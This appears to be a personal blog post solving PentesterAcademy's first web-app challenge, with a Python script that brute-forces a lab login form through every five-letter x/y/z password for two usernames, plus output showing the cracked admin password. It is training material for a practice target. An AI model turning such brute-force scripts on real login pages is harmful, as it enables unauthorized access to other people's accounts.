Core dump overflow

Core dump in progress...

PentesterAcademy WAP Challenge 1: Form Bruteforcing

| Comments

PentesterAcademy has a section dedicated to web application security challenges. In this post I will present my solution to the first challenge, which requires form bruteforcing to authenticate on the provided web page:

http://pentesteracademylab.appspot.com/lab/webapp/1

This is how the page looks like:

wap1

The provided hint should help with writing a bruteforce script:

Hint:

Company Domain: PentesterAcademy.com

Usernames: jack, admin

Password Complexity: 5 characters and uses only x,y,z lowercase. Password examples – xxyyz, xyzxy, xyxxx etc.

So, what we need here is to test the login with usernames of the form user@companydomain and 5 character passwords constructed from the given characters.

I wrote a Python script to do that:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import requests
import itertools


url = 'http://pentesteracademylab.appspot.com/lab/webapp/1'

emails = ['jack@pentesteracademy.com', \
          'admin@pentesteracademy.com']



def buildPassList(iterables, r):
    passlist = []
    for word in itertools.product(iterables, repeat = r):
        passlist.append(''.join(word))
    return passlist

passlist = buildPassList('xyz', 5)

count = 0
fail = 'Failed! Please try again!'
for user in emails:
    for passwd in passlist:
        print 'Try %d - email: %s password: %s' % (count, user, passwd)
        payload = {'email': user, 'password': passwd}
        req = requests.get(url, params=payload)
        if fail not in req.content:
            print payload
            print req.content
            break
        count += 1

I used the requests module, which is very handy for all sorts of URL interaction. To figure out the parameter names and how are they passed to the login form, I tested with some garbage values and saw the URL looked like this:

1
http://pentesteracademylab.appspot.com/lab/webapp/1?email=test&password=xyz

From that I knew to use the GET request in the code. Also, when you fail, you get a message stating that you should try again, so I looked for that in the response from the server, and I concluded that if it were absent, it means that the login was successful. When you complete the challenge, there is also a message that says “Well done! This challenge has been cracked!”

Here is a snippet of the output:

1
2
3
4
5
6
Try 0 - email: jack@pentesteracademy.com password: xxxxx
Try 1 - email: jack@pentesteracademy.com password: xxxxy
...
Try 477 - email: admin@pentesteracademy.com password: zzzxx
Try 478 - email: admin@pentesteracademy.com password: zzzxy
{'password': 'zzzxy', 'email': 'admin@pentesteracademy.com'}

Today’s fortune cookie:

While you recently had your problems on the run, they’ve regrouped and are making another attack.

Comments